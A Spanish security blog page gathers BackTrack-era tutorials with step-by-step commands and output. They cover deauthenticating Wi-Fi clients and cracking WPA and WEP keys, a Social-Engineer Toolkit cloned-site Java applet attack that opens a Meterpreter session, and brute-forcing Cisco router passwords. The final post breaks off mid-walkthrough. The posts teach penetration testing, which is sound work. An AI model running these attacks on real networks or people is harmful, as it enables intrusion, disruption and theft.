Seguridad y Redes

Tips & Video Tutoriales, Wifislax, VMware, GNS3, VirtualBox, CCNA, Cisco Routers & Switches, [ Programming ]

Cracking WPA/WPA2 con CoWPAtty & Aircrack-ng

Aunque WPA (Wi-Fi Protected Access) es más seguro que WEP (Wired Equivalent Privacy), en el instante inicial en que la conexión se establece, WPA es más vulnerable que WEP ya que es necesario capturar un menor número de frames (solo es necesario capturar un total de 4 frames del handshake intercambiadas entre el cliente y el punto de acceso para llevar el descubrimiento de claves) para obtener la clave inicial de cifrado mediante ataques de diccionario.

WPA es vulnerable a un ataque de diccionario y para este ataque es necesario el obtener el 4 way handshake entre el cliente y el punto de acceso. Es necesario también un wordlist o diccionario de palabras. Luego, utilizando herramientas como CoWPAtty y Aircrack-ng intentar obtener la clave pre compartida de WPA/WPA2.

CoWPAtty fue creado por Joshua Wright http://www.willhackforsushi.com/?page_id=50 y tiene todas las características que uno podría desear de una buena herramienta sin salir de su propósito. Esta herramienta es para automatizar el ataque de diccionario a las redes WPA-PSK y es muy sencillo de utilizar. Lo primero que haremos es lanzara airodump-ng para seleccionar un objetivo.
root@bt:~# airodump-ng mon0
En buscando de un Objetivo.

Tal como podemos ver en la imagen anterior, hay dos clientes conectados a la red "Wireless" y tiene encriptación WPA, con cifrado TKIP. Ahora lo que haremos es lanzar airodump-ng para que escuche en el canal donde esta transmitiendo el punto de acceso que tenemos como objetivo, en este caso "Wireless" que esta transmitiendo en el canal 11 y despues lanzar el "Ataque 0 Deautenticación" para desautenticar a un cliente y así obtener el 4 way handshake.
root@bt:~# airodump-ng --channel 11 --bssid FX:XX:XX:XF:AB:7C --write wpademo mon0
Para obtener la captura completa de 4 frames del handshake, es necesario que haya al menos un cliente conectado o esperar a que un cliente se conecte (esto si eres muy paciente :D). Si hay un cliente conectado lo que se hará es realizar el ataque “-–deauth” o también conocido como “ataque 0” utilizando aireplay-ng y lo que sucederá aquí es, que desasociaremos al cliente conectado actualmente al punto de acceso y cuando se vuelve a conectar obtendremos los 4 frames del handshake. El detalle es que si no hay clientes conectados al punto de acceso, no podremos obtener la clave WPA ya que es necesario que haya clientes conectados o esperar que alguien se conecte al AP para la obtención del four-way handshake.

Bueno en mi caso lo que hare es desautenticar el cliente con direccion MAC "0C:XX:76:XX:D5:5B" del ESSID "Wireless".
root@bt:~# aireplay-ng --deauth 1 -a FX:XX:XX:XF:AB:7C -c 00:60:76:71:D5:5B mon0

Desautentificación de un cliente wifi.

He desasociado al cliente del punto del acceso, ahora el cliente lo que hará es volver a reautenticarse y es entonces cuando obtendremos los 4 paquetes del handshake. En la reautenticación se generarán los 4 paquetes de autenticación (handshake) en los que estamos interesados en capturar. Después estos paquetes los usaremos para intentar obtener la clave precompartida WPA/WPA2.

Bueno ahora pongan atención en la siguiente imagen donde se muestra una sesión de airodump-ng y en la parte superior de la imagen se muestra un mensaje "WPA handshake F4:C7:14:6F:AB:7". El four-way handshake ha sido capturado.

Four-way handshake capturado.

Tal y como se muestra en la imagen anterior, hemos obtenido los 4 paquetes handshake. Estos cuatro paquetes como lo mencionamos anteriormente los utilizaremos para obtener la clave WPA/WPA2 precompartida. Para esto necesitaremos un wordlist o diccionario de palabras, el cual contiene la contraseña de WPA/WPA2-PSK.

Antes de pasar al siguiente paso, ahora lo que haremos es detener airodump-ng y abriremos el archivos ".cap" capturado con Wireshark para ver el “four-way handshake”. El archivo debe ser algo similar a la siguiente captura.

EAPOL Key

Bueno ahora lo que haremos es empezar el crackeo, para esto necesitaremos un wordlist y es aquí donde entra en juego CoWPAtty. Debemos de indicarle a CoWPAtty la ruta donde tenemos el wordlist o diccionario de palabras, también la captura del four-way handshake y por ultimo el SSID de la red wifi, que en este caso es "Wireless". Básicamente lo que hara CoWPAtty es ir comprobando cada una de esas palabras que contiene el diccionario si coincide con la clave. Este proceso todo será dependiendo de la velocidad de nuestro CPU, también de la calidad y el tamaño del diccionario de palabras (wordlist), esto puede llevar bastante tiempo, incluso días o años jeje si eres impaciente puedes esperar :D. Bueno Lanzamos CoWPAtty desde consola.
root@bt:~# cowpatty -r wpademo-02.cap -f /pentest/passwords/john/password.lst -2 -s Wireless
El Crackeo con CoWPAtty ha tenido éxito.

Para especificar nuestro diccionario de palabras lo hacemos con el parámetro –f (-f /pentest/passwords/john/password.lst), el SSID con el parámetro –s (-s Wireless) y el archivo capturado con el parámetro –r (-r wpademo-02.cap). El ultimo parámetro -2, es el modo no estricto, esto se requiere cuando no tenemos capturados los 4 frames del handshake, es decir el paquete completo. Por cierto una opción bastante buena.

En este ejemplo he utilizado un diccionario de palabras que lo trae incluido BackTrack de John the Ripper, el archivo se encuentra en el directorio /pentest/passwords/john/password.lst

Es importante comentar que para el crackeo de WPA debemos de tener un muy buen diccionario de palabras. La distribución de BackTrack incluye unos cuantos diccionarios pero estos puede que no sean suficientes, para esto deben de buscar en Google o igual existen generadores de palabras que automatizan este proceso de generar diccionarios.

Ahora veamos un ejemplo final utilizando Aircrak-ng. Vamos a especificar la ruta de nuestro diccionario con el parámetro –w (-w /pentest/passwords/john/password.lst) y nuestro archivo de captura (wpademo-02.cap).
root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst wpademo-02.cap
Aircrack-ng en Acción.

Para el crackeo de WPA2 el proceso es el mismo, no hay diferencia. También hay que tener muy en cuenta de que al tratarse de un ataque de diccionario el requisito previo es que la contraseña debe estar en el diccionario de palabras que le estamos indicando, si la frase u contraseña no se encuentra en el diccionario, el ataque no tendrá éxito.

Updating Metasploit Framework & Social Engineer Toolkit en BackTrack 5

Social Engineer Toolkit (SET) se integra muy bien con Metasploit. Al usar cualquier de estas herramientas, siempre es bueno asegurarse de tener la ultima versión. Con Metasploit la regla de oro es actualizarlo a diario jeje bueno al menos cuando lo utilices, ten asegurado de tener la ultima versión, antes de cualquier prueba.

Para actualizar Metasploit Framework solo tenemos que ir al Menu BackTrack - Exploitation Tools - Network Exploitation Tools - Metasploit Framework - msfupdate o también lo podemos hacer desde consola, tecleando el siguiente comando.
#msfupdate
Para actualizar la herramienta Social Engineer Toolkit (SET) solo tenemos que ir a la dirección donde se encuentra la herramienta y ejecutarla.
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ls
config  modules  readme  reports  set  set-automate  set-proxy  set-update  setup.py  set-web  src
root@bt:/pentest/exploits/set# ./set
Una vez ejecutado nos preguntara la tarea que deseamos realizar.
Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 5
Elegimos la opción 5, que es para actualizar y listo. También podemos hacerlo en un solo paso desde consola tecleando el siguiente comando. ./set-update
root@bt:/pentest/exploits/set# ./set-update

Vector de Ataque Web con Social-Engineer Toolkit (SET)

Social-Engineer Toolkit (SET) es un conjunto de colección de scripts en Python especialmente diseñadas para realizar ataques de ingeniería social en procesos de auditorias de seguridad. Esta herramienta fue creada por David Kennedy (ReL1K), el mismo creador de otra herramienta muy popular llamada Fast-Track, que también es una herramienta que automatiza algunos ataques más comunes y más usados en las pruebas de penetración (penetration test) mediante algunos scripts hechos en Python.

Social-Engineer Toolkit (SET) nos permite crear archivos PDF, sitios web falsos y enviar correos electrónicos con código malicioso incrustado, por cierto también se integra con el Metasploit Framework.

Como bien sabran y se han dado cuenta, la ingeniería social no es nada nuevo, los ataques de ingeniería social están ahora en su punto más alto, es decir en pleno auge y siempre han sido un gran riesgo para muchas organizaciones. Una persona que esta tratando de convencer a otras personas para que realicen actos que normalmente no harian es muy antigua como la misma historia de la tierra :D

Muchos creen que la ingeniería social es uno de los mayores riesgos que enfrentan las organizaciones actualmente, ya que es muy difícil proteger a las organizaciones de estos ataques. Por ejemplo puede que se acuerden del ataque a Google, del llamado “Operación Aurora” (también conocida como Comele o Hydraq) en el que la técnica de ingeniería social fue utilizada para atacar a Gmail y otras fuentes de Google.

Un vector de ataque es la vía que se utiliza para obtener información o acceso a un determinado sistema y la herramienta Social-Engineer Toolkit (SET) clasifica a los ataques por vectores de ataques web, correo, electrónico y también los ataques basados en USB. Utiliza correo electrónico, sitios web falso y otros vectores que típicamente lo que hacen es engañar a los usuarios a comprometer la información sensible. Cada vector puede tener éxito o todo lo contrario, dependiendo del objetivo a atacar y también el tipo de comunicación utilizada. SET también viene con correos electrónicos y plantillas de páginas web ya predefinidas que pueden ser utilizadas para los ataques de ingeniería social, también utiliza la herramienta Metasploit Framework. Así que en este post se mostrara un ejemplo de vector de ataque basado en web, manos a la obra y listos para la primera prueba.

Herramientas Utilizadas

Instalación de Social Engineer Toolkit (SET)

La instalación de SET es sencilla, lo que necesitamos es tener instalado Phyton y Metasploit Framework, ambas herramientas están instaladas en la distribución de BackTrack y no hay que preocuparnos por nada sobre cosas de la configuración e instalación, solo tenemos que tener actualizados a las versiones más recientes. Pero si requieren instalarlo en alguna otra distribución diferente, solo abrir la consola y teclear o copiar el siguiente comando.
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Después de ejecutar el comando anterior, tendremos un nuevo directorio que contiene todas herramientas necesarias para la ejecución de Social-Engineer Toolkit (SET).

Ejecutando Social-Engineer Toolkit (SET)

Para ejecutar SET es un proceso sencillo, ya que solo tenemos que abrir una terminal o consola y simplemente tenemos que teclear ./set. Bueno lo primero tenemos que estar en el directorio donde tenemos la herramienta, en BackTrack se encuentra en el directorio /pentest/exploits/set/. Lo haremos de la siguiente manera.
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ls
config modules readme reports set set-automate set-proxy set-update setup.py set-web src
root@bt:/pentest/exploits/set# ./set
Ejecución de Social-Engineer Toolkit (SET).

El comando ./set inicia la ejecución de SET y nos muestra el menú inicial. En este post veremos un ejemplo de un vector de ataque basado en web, clonando un sitio web y utilizando el método de ataque de Java Applet.

Website Attack Vectors

Los vectores de ataque web son probablemente uno de los aspectos más avanzados e interesantes de esta herramienta ya que están especialmente diseñados para ser de un aspecto muy creíble y de una apariencia muy atractiva para la víctima. Esta herramienta puede clonar sitios web que son idénticos a los sitios de confianza que normalmente visita un usuario normal, esto asegura a la víctima de que aparentemente está visitando un sitio legítimo.

Java Applet Attack

Uno de los ataques basados en un sitio web que tienes disponible Social-Engineer Toolkit (SET), es el ataque de Java Applet (Java Applet Attack), es uno de los vectores de ataque más exitoso de esta herramienta. Este ataque malicioso lo que hace es mostrar un applet de Java en el navegador web invitando a que el usuario de clic, en este caso a ejecutar el applet. Este ataque no se considera una vulnerabilidad de Java.

Para ejecutar este ataque en el menú principal de SET debemos primero elegir la opción 2, Website Attack Vectors. Al elegir la esta opción, nos mostrara en consola las siguientes opciones.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

Java Applet Attack Method

Elegimos la opción 1, Java Applet Attack Method y nos mostrara lo siguiente.


Elegimos la opción que 1 o 2, en mi caso la opción 2 donde pongo el sitio a clonar, en mi caso puse mi blog, delfirosales.blogspot.com y se generara la clonación del sitio.

Hemos creado un servidor de alojamiento con un sitio web clonado en este caso, el sitio es mi blog delfirosales.blogspot.com.
En el siguiente paso dependiendo del escenario u objetivo elegimos la opción adecuada, en mi caso realice la prueba con la opción 2, Windows Reverse_TCP Meterpreter.


Después elegimos el backdoor, en mi caso elegí la opción 16, Backdoored Executable (BEST), elegimos el puerto, esperamos a que se genere la configuración y esperamos a que cargue Metasploit Framework.


Ahora que tenemos todo listo, solo tenemos que tener un objetivo a atacar para que navegue a través del sitio malicioso. Al llegar a la pagina web, la victima se le mostrar una advertencia pop-up tal como se muestra en la siguiente figura.


Si la victima da clic en Ejecutar (que por cierto la mayoría de los usuarios la hacen) el exploit será ejecutado y con esto tendremos acceso y el control total del sistema de la victima, en este caso la maquina con Windows XP SP3, tal y como se muestran en las siguientes imágenes.


De vuelta en nuestro equipo atacante, la sesión de Meterpreter se ha establecido correctamente y ahora tenemos el acceso a la maquina de la victima, tal como se muestra.


Referencias:
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
Social Engineering: The Art of Human Hacking
Penetration Tester's Open Source Toolkit, Third Edition

Password Brute Force con Cisco Auditing Tool

Cisco Auditing Tool (CAT) es una mini herramienta de auditoría de seguridad. Analiza las vulnerabilidades mas comunes de los routers Cisco, como las contraseñas por defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS. Incluye tambien soporte para demás plugins y el escaneo de múltiples hosts.

En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al menú Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco Tools. Una vez que la ventana de la consola se haya cargado correctamente, podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro objetivo.

Cisco Auditing Tool en BackTrack.

En caso de que decidamos utilizar la herramienta directamente desde la terminal, lo podemos realzar de la siguiente manera.

cd /pentest/cisco/cisco-auditing-tool/
./CAT --help

Y lo anterior nos mostrara lo siguiente.
./CAT version [unknown] calling Getopt::Std::getopts (version 1.06 [paranoid]),
running under Perl version 5.10.1.

Usage: CAT [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]

The following single-character options are accepted:
With arguments: -h -f -p -w -a -l
Boolean (without arguments): -i -q

Options may be merged together.  -- stops processing of options.
Space is not required between options and their arguments.
[Now continuing due to backward compatibility and excessive paranoia.
See ``perldoc Getopt::Std'' about $Getopt::Std::STANDARD_HELP_VERSION.]

Cisco Auditing Tool - g0ne [null0]
Usage:
-h hostname (for scanning single hosts)
-f hostfile (for scanning multiple hosts)
-p port # (default port is 23)
-w wordlist (wordlist for community name guessing)
-a passlist (wordlist for password guessing)
-i [ioshist] (Check for IOS History bug)
-l logfile (file to log to, default screen)
-q quiet mode (no screen output)

root@delfi:/pentest/cisco/cisco-auditing-tool#
Cisco Auditing Tool.

Estas son las opciones y descripciones sobre el uso de CAT. Vamos a ejecutar las siguientes opciones en contra de nuestro objetivo, un dispositivo Cisco (2600).

-h hostname (for scanning single hosts)
-w wordlist (wordlist for community name guessing)
-a passlist (wordlist for password guessing)

Esta combinación de fuerza bruta y escaneo del dispositivo cisco es para averiguar cualquier contraseña conocida y los nombres de las comunidades SNMP. Antes de realizar la prueba, tenemos que actualizar también la lista de las contraseñas y community strings de SNMP en la ruta pentest/cisco/cisco-auditing-tool/lists con el fin de obtener una mayor probabilidad de éxito. Bueno vamos a realizarlo de la siguiente manera.

./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -1

root@delfi:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -1
Unknown option: 1

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.1.102

Guessing passwords:

Invalid Password: list
Invalid Password: cisco1
Invalid Password: cisco
Invalid Password: passwordvty
Password Found: p4sswordvty
Invalid Password: ciscos
Invalid Password: public
Invalid Password: private
Invalid Password: admin
Invalid Password: cisco_comu
Invalid Password: cisco1
Invalid Password: cisco2
Invalid Password: router
Invalid Password: routercisco
Invalid Password: secret
Invalid Password: Cisco
Invalid Password: telnet
Invalid Password: 123456
Invalid Password: default
Invalid Password: nicolay
Invalid Password: router1
Invalid Password:

Guessing Community Names:

Invalid Community Name: list
Community Name Found: public
Community Name Found: private
Invalid Community Name: cisco
Invalid Community Name: cisco1
Community Name Found: ciscos
Invalid Community Name: default
Invalid Community Name: Cisco
Community Name Found: cisco_comu
Invalid Community Name: adm

---------------------------------------------------
Audit Complete
Salida de Cisco Auditing Tool.

Para obtener mejores resultados lo recomendable es editar los archivos que se encuentran en la ruta pentest/cisco/cisco-auditing-tool/lists podemos utilizar cualquier editor de texto o el editor Vim para agregar mas palabras a los archivos y así obtener unos mejores resultados de salida.

SIOCSIFFLAGS: Unknown error 132 - para RTL8187 en BackTrack 5

Solucion al error SIOCSIFFLAGS: Unknown error 132 en chipset rt1887.


Los chipset rtl8187 en BackTrack 5 desde VMware al hacer
root@delfi:~# ifconfig wlan1 up
SIOCSIFFLAGS: Unknown error 132
el fastidioso SIOCSIFFLAGS, bueno aquí esta la solución al "SIOCSIFFLAGS: Unknown error 132". Abrimos consola.
rmmod rtl8187
rmmod mac80211
modprobe rtl8187
ifconfig wlan0 up
y ya con eso, tenemos el rtl8187 que se puede levantar con la orden ifconfig.
root@delfi:~# ifconfig wlan0 up
root@delfi:~#
y ya no da errores :)

Esto también se puede realizar copiando lo siguiente en un archivo de texto y guardarlo en alguna ubicación de nuestro disco duro con cualquier nombre, en mi caso rtl8187.
#!/bin/bash
echo Removiendo Modulo RTL8187
rmmod rtl8187
echo Removiendo Modulo MAC80211
rmmod mac80211
echo Agregando Modulo RTL8187
modprobe rtl8187
echo wlan0 up
ifconfig wlan0 up
Abrimos consola y nos vamos a la dirección donde tenemos ubicado el archivo y tecleamos.

chmod 755 rlt8187
./rtl8187

y listo, una imagen dice mas que mil palabras :)

Ataque 4: Ataque chopchop + Ataque 2 : Interactive Packet Replay

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin necesidad de conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela únicamente el texto plano. De cualquier modo, algunos puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el punto de acceso tira paquetes menores de 42 bytes, aireplay intenta adivinar el resto de los datos, tan pronto como el encabezado (headers) sea predecible. Si un paquete IP es capturado, automáticamente comprueba el checksum del encabezado para ver si es correcto, y despues trata de adivinar las partes que le faltan. Este ataque requiere como mínimo un paquete de datos WEP.

Modo Monitor con Airmon-ng

Nuestro primer paso sera poner nuestro dispositivo inalambrico en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
root@bt:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID       Name
1232      dhclient3
2118      dhclient3
Process   with PID 2082 (ifup) is running on interface wlan0
Process   with PID 2118 (dhclient3) is running on interface wlan0

Interface         Chipset           Driver

wlan0             Ralink RT2870/3070       rt2800usb - [phy1]
                 (monitor mode enabled on mon0)
root@bt:~#
Ahora lanzamos airodump-ng para escanear las redes que están a nuestro alcance y asi poder elegir una red en especifico.
root@bt:~# airodump-ng mon0

CH  2 ][ Elapsed: 8 s ][ 2011-06-07 12:39                          
                                                            
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                            
00:18:3F:18:85:C9  -127        4        2    0   6  54 . WEP  WEP         2WIRE974
                                                            
BSSID              STATION            PWR   Rate    Lost  Packets  Probes 
                                                            
00:18:3F:18:85:C9  0C:60:76:71:D5:5B  -127    0 -54      0        1         

root@bt:~#
Elegimos la red objetivo y lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:18:85:C9).
root@bt:~# airodump-ng -c 6 -w captura --bssid 00:18:3F:18:85:C9 mon0

Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos.
 CH  6 ][ Elapsed: 1 min ][ 2011-06-07 12:55 ][ Decloak: 00:18:3F:18:85:C9 
                                                            
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                            
00:18:3F:18:85:C9  -127  93      909     241    2  6  54 . WEP  WEP    OPN  2WIRE974
                                                            
BSSID              STATION            PWR   Rate    Lost  Packets  Probes 
                                                            
00:18:3F:18:85:C9  00:C0:CA:4A:82:97    0    0 - 1      0 9638
Ataque 1: Falsa Autenticación

Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
root@bt:~# aireplay-ng -1 0 -e 2WIRE974 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:37  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6

12:54:37  Sending Authentication Request (Open System) [ACK]
12:54:38  Authentication successful
12:54:38  Sending Association Request [ACK]
12:54:38  Association successful :-) (AID: 1)
Ataque 4: Ataque Chopchop

Una vez autenticado correctamente lanzamos el ataque chopchop con el siguiente comando. El -4 significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.
root@bt:~# aireplay-ng -4 -b 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:48  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6


Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID  =  00:18:3F:18:85:C9
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:18:3F:18:85:C9

0x0000:  0842 3a01 ffff ffff ffff 0018 3f18 85c9  .B:.........?...
0x0010:  0018 3f18 85c9 d06e 3f5d 5c00 0695 56a5  ..?....n?]\...V.
0x0020:  05bb c1d0 3adf e8c9 d3db da6a 5fc0 a283  ....:......j_...
0x0030:  e901 d215 c1a4 5a7a efc0 ea3f 255f 0c69  ......Zz...?%_.i
0x0040:  a4d8 6b51                                ..kQ

Use this packet ? y

Saving chosen packet in replay_src-0607-125448.cap

Offset   67 ( 0% done) | xor = 03 | pt = 52 |  234 frames written in  3993ms
Offset   66 ( 2% done) | xor = 81 | pt = EA |  167 frames written in  2833ms
Offset   65 ( 5% done) | xor = 6F | pt = B7 |   85 frames written in  1446ms
Offset   64 ( 8% done) | xor = 10 | pt = B4 |  197 frames written in  3348ms
Offset   63 (11% done) | xor = 2A | pt = 43 |  171 frames written in  2901ms
Offset   62 (14% done) | xor = 0D | pt = 01 |  126 frames written in  2148ms
Offset   61 (17% done) | xor = F7 | pt = A8 |  212 frames written in  3609ms
Offset   60 (20% done) | xor = E5 | pt = C0 |  216 frames written in  3670ms
Offset   59 (23% done) | xor = C0 | pt = FF |  186 frames written in  3156ms
Offset   58 (26% done) | xor = 15 | pt = FF |   59 frames written in  1008ms
Offset   57 (29% done) | xor = 3F | pt = FF |   43 frames written in   731ms
Offset   56 (32% done) | xor = 10 | pt = FF |   91 frames written in  1545ms
Offset   55 (35% done) | xor = 85 | pt = FF |   73 frames written in  1248ms
Offset   54 (38% done) | xor = A5 | pt = FF |   29 frames written in   487ms
Offset   53 (41% done) | xor = 5A | pt = FE |  214 frames written in  3629ms
Offset   52 (44% done) | xor = C0 | pt = 01 |   43 frames written in   742ms
Offset   51 (47% done) | xor = BD | pt = A8 |  137 frames written in  2322ms
Offset   50 (50% done) | xor = 12 | pt = C0 |   35 frames written in   606ms
Offset   49 (52% done) | xor = C8 | pt = C9 |  223 frames written in  3783ms
Offset   48 (55% done) | xor = 6C | pt = 85 |   47 frames written in   801ms
Offset   47 (58% done) | xor = 9B | pt = 18 |   64 frames written in  1087ms
Offset   46 (61% done) | xor = 9D | pt = 3F |  252 frames written in  4287ms
Offset   45 (64% done) | xor = D8 | pt = 18 |  108 frames written in  1836ms
Offset   44 (67% done) | xor = 5F | pt = 00 |  241 frames written in  4099ms
Offset   43 (70% done) | xor = 6B | pt = 01 |  193 frames written in  3282ms
Offset   42 (73% done) | xor = DA | pt = 00 |   98 frames written in  1660ms
Offset   41 (76% done) | xor = DF | pt = 04 |  163 frames written in  2773ms
Offset   40 (79% done) | xor = D5 | pt = 06 |   68 frames written in  1157ms
Sent 1000 packets, current guess: E4...

The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0607-125543.cap
Saving keystream in replay_dec-0607-125543.xor

Completed in 40s (0.75 bytes/s)
Como se puede observar, tuvimos exito con el ataque chopchop. El archivo llamado keystream in replay_dec-0607-125543.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0607-125543.xor -w ARP
Wrote packet to: ARP
Ataque 2: Interactive Packet Replay

Inyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:4A:82:97)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID  =  00:18:3F:18:85:C9
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:C0:CA:4A:82:97

0x0000:  0841 0201 0018 3f18 85c9 00c0 ca4a 8297  .A....?......J..
0x0010:  ffff ffff ffff 8001 3f5d 5c00 0695 56a5  ........?]\...V.
0x0020:  05bb c1d0 3adf e8c9 d3db da6a 5f18 57d1  ....:......j_.W.
0x0030:  ee5f ed42 3fa5 a585 103f 15c0 1a08 f2d5  ._.B?....?......
0x0040:  3f8a 5f41                                ?._A

Use this packet ? y

Saving chosen packet in replay_src-0607-125633.cap
You should also start airodump-ng to capture replies.

Sent 16265 packets... (500pps)
Por ultimo lanzamos aircrack-ng para obtener la clave WEP.
root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 98407 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  2WIRE974                  WEP (21485 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21572 ivs.

                           Aircrack-ng 1.1 r1904


          [00:00:05] Tested 866 keys (got 20515 IVs)

KB    depth   byte(vote)
0     11/  13    C0(25600) 76(25344) 8B(25344) A6(25344) F6(24832) 12(24576) 73(24576)
1      0/   3    02(31232) 19(27904) EB(26880) 6E(26624) 8E(26624) 70(26368) 09(26112)
2      0/   4    95(31232) F2(29184) 59(26880) 14(26880) 6E(26112) 03(25856) 75(25856)
3      0/   6    92(30464) 92(28160) E5(27904) 3D(26368) C3(26112) D5(26112) 92(25344)
4      0/   1    80(34048) 06(28416) 9F(26880) 76(26624) 8A(26624) F1(26624) FB(26624)

                              KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
Referencias:
Hacking Exposed Wireless, Second Edition
Ataque 4: Ataque chopchop
En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección de paquetes

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.cap
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#
Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0
CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#
Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

